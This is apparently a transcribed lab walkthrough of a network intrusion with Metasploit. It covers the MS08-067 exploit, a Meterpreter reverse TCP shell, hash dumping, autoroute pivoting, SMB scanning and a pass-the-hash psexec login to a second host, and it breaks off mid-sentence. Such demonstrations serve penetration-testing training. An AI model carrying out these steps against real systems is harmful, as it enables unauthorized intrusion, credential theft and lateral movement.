All right, so what you see on the screen is the desktop of the attacker machine, which is Kali Linux. Open Metasploit framework by typing msf console. And as most of you might already know, Metasploit framework is one of the most commonly used tools for exploitation, post-exploitation, etc., and even scanning using the auxiliary modules. So the victim machine that I have is a vulnerable machine, and I am going to use the MS080667 SMB vulnerability. So let us find out that, or any other vulnerability can be typed by typing the name, search, and then the name of the vulnerability or the exploit, sorry. So I type search MS08067. I'll have to probably type the whole name since there is not a list or not numbered. So I'll just type use exploit Windows SMB MS08 tab, and then I've set the exploit. Let us look at the options for the requirements, and you can see I need to specify the IP of the target machine as our host, and let us check the IP of the target machine in the environment that I have. The IP is 10.10.10.20, so let us specify that. All right, so let us confirm that I've set this IP by typing options, and as you can see, the R host has 10.10.10.20. Okay, so next up, we set the payload, which we are going to use for the exploit. Mind the voice of my cat, by the way. All right, so set payload, and one of the most easy to use payload is Meterpreter reverse TCP. In case of Windows, we're going to use that. You set payload, Windows, Meterpreter, reverse TCP. And once we have set the payload, we need to check the requirements of the payload as well. So we type options, so as you can see, I need to specify the L host, which is the attacker machine IP, to which the session will be returned since I'm using reverse TCP. So I specify my IP, which as we checked earlier was 10.10.10. All right, so now that we have everything set, let us run this exploit, and voila, we have a session opened. And as you can see, it is Meterpreter session 1 opened. And in order to make sure, let us type ifconfig. As you can see, the IP address is 10.10.20. And you might already see on interface number 2, the IPv4 is 172.16.0.20. And this is the other network to which this machine is connected. And we are going to use this machine as pivot in order to attack into the next network or next machine. Okay, so now that we have session opened on the first machine, we are going to dump the hashes. So we use the available option in Metasploit itself, which is use post Windows gather hashdom. We could also use hashdom in Meterpreter, which we saw a few seconds earlier. So when we use Metasploit for this, we need to specify the session which I have, and then I run it. And as you can see, it is obtaining the list and the keys, and I have the hash of different users. And as you can see, administrator, guest, help assistant, and support. All right, so now that we have the hashes, we will be moving to the next part, which is making this machine as my pivot to hack into the machine on the other network as a pivot. So I will be start doing that. I use Metasploit use post multi slash manage slash auto route, and we type options to look at the requirements for that. And as you can see, I need to specify the session. The CMD is by default set to auto add, which I'll specify to add. And by default, the subnet was of the machine on which of the network on which the machine was already at, which was 10.10.10. So I need to change that. So I will set the subnet to 172.16.0.0. Next up, I'll specify the session, which is set session 1. Let us confirm that our settings have been specified by typing options or directly run it. So when I type route, as you can see, my subnet has changed to 172.16.0.0. All right, so far we have changed the subnet of the victim machine. Next up, we are going to scan the other machines on this network. So we are going to use auxiliary to find out the open ports, and we will specify some of the interesting ports such as 445, 3389. So let us just type use auxiliary scanner port scan slash TCP. And then we set the ports 139.445 and 3389. All right. So now we are going to mention the our hosts, which is going to be the entire network. And then we are going to run this scan. So you can see I've specified the range of IPs to be scanned and ports. We'll do this in background so that whenever a port is find open, so I have already done that part because the scan usually takes around 10 minutes. So I found two IPs on the network, 150 and 175, on which port 445 was open. So I'm going to use the next part, which is checking the SMB version on those machines. So I use auxiliary scanner SMB version. Then I specify the hosts. So these results can be put into my database as well, which we saw earlier. At the moment, you can see that the version have been identified as Windows 7 on one machine. And when I type host, you can see one is Windows XP and the other is Windows 7. For the services, I can see the different ports, 445 and 405 open on 150 and 175. So far we have been scanning these two machines. Let's again go back to our database in which we dumped the usernames and the hashes on the first machine. So we'll copy this hash for administrator, copy, and I'm going to use the exploit in Metasploit, use exploit Windows SMB PSXX, which can let me log in through the SMB service, given that I have a SMB user ID and password. So I'll set the rhost 172.16.0.150. So in the options, you can see I need to specify the SMB password and the SMB user to authenticate with. So I set SMB password and then paste the hash that I just copied. This, by the way, is a method to log into a machine for which you only have the hashed password. So the SMB password is set. Then I set the SMB user, which is going to be administrator. Just make sure by typing options. So as you can see, the hash is copied as SMB pass and the SMB user is specified as administrator. And now we select the payload. So this time we are not going to use reverse TCP because in case of pivoting, it can be an issue returning uh, the session. So we'll just use bind TCP. So set payload Windows x64 interpreter bind TCP. So the payload is set as bind TCP. You can also see the requirements of that. So everything is set. Now we run the exploit. Let's hope it runs, and voila. As you can see, I have session 2 opened, which is from 10.10.10 to 10.10.20 to 172.16.0.150. All right, so we have used